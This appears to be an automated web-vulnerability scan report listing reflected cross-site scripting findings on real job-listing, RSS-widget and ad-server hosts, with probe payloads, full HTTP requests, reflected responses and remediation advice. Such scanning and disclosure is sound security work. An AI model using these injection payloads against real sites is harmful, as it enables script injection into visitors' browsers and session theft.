This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/12541544b8b'%3b0e868ba3cf5/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1 Host: europe-jobs.fins.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34c8c'%3be375a52b194 was submitted in the REST URL parameter 3. This input was echoed as 34c8c';e375a52b194 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist34c8c'%3be375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD HTTP/1.1 Host: europe-jobs.fins.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist34c8c';e375a52b194?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist34c8c';e375a52b194'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='ht ...[SNIP]...
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26505'-alert(1)-'116ee732501 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501 HTTP/1.1 Host: europe-jobs.fins.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD26505'-alert(1)-'116ee732501&JobId=125415&JobName=FX-Sales-Specialist'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!='undefined' ...[SNIP]...
1.57. http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://europe-jobs.fins.com
Path:
/Jobs/125415/FX-Sales-Specialist
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8a35'-alert(1)-'86ecb919995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1 HTTP/1.1 Host: europe-jobs.fins.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&e8a35'-alert(1)-'86ecb919995=1&JobId=125415&JobName=FX-Sales-Specialist'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!='undefined ...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6051f'-alert(1)-'9f8af293c8d was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD HTTP/1.1 Host: europe-jobs.fins.com Proxy-Connection: keep-alive Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://europe-jobs.fins.com/Jobs/125415/FX-Sales-Specialist?reflink=djm_modulewsj_widgetjobs_jobsatdmedia6051f'-alert(1)-'9f8af293c8d&cobrand=ATD&JobId=125415&JobName=FX-Sales-Specialist'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!= ...[SNIP]...
The value of the rssmikle_css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 321b0'><script>alert(1)</script>4de901e5125 was submitted in the rssmikle_css_url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_font_size request parameter is copied into the HTML document as plain text between tags. The payload 4b4c4<script>alert(1)</script>bf4a4e65793 was submitted in the rssmikle_font_size parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_frame_height request parameter is copied into the HTML document as plain text between tags. The payload 53eea<script>alert(1)</script>db1fb3cd0c6 was submitted in the rssmikle_frame_height parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_frame_width request parameter is copied into the HTML document as plain text between tags. The payload 35a89<script>alert(1)</script>d16cd2cfc2d was submitted in the rssmikle_frame_width parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload 567c0<script>alert(1)</script>9c40e50b23f was submitted in the rssmikle_item_bgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_bgcolor request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6dc9'%3balert(1)//25f736e5d37 was submitted in the rssmikle_item_bgcolor parameter. This input was echoed as f6dc9';alert(1)//25f736e5d37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rssmikle_item_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 8aede<script>alert(1)</script>3fd943d3e7b was submitted in the rssmikle_item_bgimage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_description_color request parameter is copied into the HTML document as plain text between tags. The payload 82f71<script>alert(1)</script>911cbac5acb was submitted in the rssmikle_item_description_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_item_podcast request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5cdc5'%3balert(1)//de6c201b5f2 was submitted in the rssmikle_item_podcast parameter. This input was echoed as 5cdc5';alert(1)//de6c201b5f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rssmikle_item_title_color request parameter is copied into the HTML document as plain text between tags. The payload 66512<script>alert(1)</script>2af99c2604f was submitted in the rssmikle_item_title_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e227'%3balert(1)//699ffd7f0a5 was submitted in the rssmikle_target parameter. This input was echoed as 3e227';alert(1)//699ffd7f0a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... n strToInt(str) { num = parseInt(str); if(isNaN(num)){ return 0; } else if(!num) { return 0; } return num; }
function init() { var rssMikleType = ''; var anchorTarget = '_blank3e227';alert(1)//699ffd7f0a5'; var itemPodcast = 'icon';
var containerObj = document.getElementById('container'); var headerObj = document.getElementById('header') ? document.getElementById('header') : ""; var contentObj ...[SNIP]...
The value of the rssmikle_target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fec0"><script>alert(1)</script>00a39daf45e was submitted in the rssmikle_target parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_title_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload e21c2<script>alert(1)</script>91be55c18e9 was submitted in the rssmikle_title_bgcolor parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_title_bgimage request parameter is copied into the HTML document as plain text between tags. The payload 52655<script>alert(1)</script>74461a05d22 was submitted in the rssmikle_title_bgimage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_title_color request parameter is copied into the HTML document as plain text between tags. The payload f76d5<script>alert(1)</script>a4e3224bec was submitted in the rssmikle_title_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rssmikle_type request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8347c'%3balert(1)//a640d3a46b8 was submitted in the rssmikle_type parameter. This input was echoed as 8347c';alert(1)//a640d3a46b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 90094<script>alert(1)</script>f3f7caa5adf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000848 Content-Length: 68 Date: Wed, 07 Sep 2011 12:28:45 GMT Connection: close
Not Found: /k90094<script>alert(1)</script>f3f7caa5adf/fnb4igi-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39455<script>alert(1)</script>00a2511bc5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000818 Content-Length: 68 Date: Wed, 07 Sep 2011 12:28:45 GMT Connection: close
Not Found: /k/fnb4igi-e.css39455<script>alert(1)</script>00a2511bc5d
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f389<script>alert(1)</script>225d205b362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000783 Content-Length: 68 Date: Wed, 07 Sep 2011 12:21:09 GMT Connection: close
Not Found: /k7f389<script>alert(1)</script>225d205b362/qox0wee-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 305f9<script>alert(1)</script>8e97949099a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000944 Content-Length: 68 Date: Wed, 07 Sep 2011 12:21:09 GMT Connection: close
Not Found: /k/qox0wee-e.css305f9<script>alert(1)</script>8e97949099a
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e3385<script>alert(1)</script>282fccfaf51 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload a831d<a>d56f8d9a874 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653bf"-alert(1)-"673a59be96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai653bf"-alert(1)-"673a59be96f/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f57"-alert(1)-"2fd9033c9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.php47f57"-alert(1)-"2fd9033c9bd?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.ad.us-ec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdcb"-alert(1)-"56df82312b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /naicbdcb"-alert(1)-"56df82312b0/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db9a5"-alert(1)-"bddaee1fcc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpdb9a5"-alert(1)-"bddaee1fcc4?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f75b"-alert(1)-"2a1250a692f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai4f75b"-alert(1)-"2a1250a692f/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adserverec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7286"-alert(1)-"dc5589e669e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpd7286"-alert(1)-"dc5589e669e?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adserverec.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b887"-alert(1)-"3354bebcba6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai1b887"-alert(1)-"3354bebcba6/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adserverwc.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc109"-alert(1)-"1c14d276541 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpdc109"-alert(1)-"1c14d276541?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adserverwc.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eee26"-alert(1)-"5f399683112 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c4d"-alert(1)-"4b274db9fdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21e7f"-alert(1)-"ff89196e097 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai21e7f"-alert(1)-"ff89196e097/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46a2"-alert(1)-"70ee2108da2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpa46a2"-alert(1)-"70ee2108da2?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.adtech.de Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
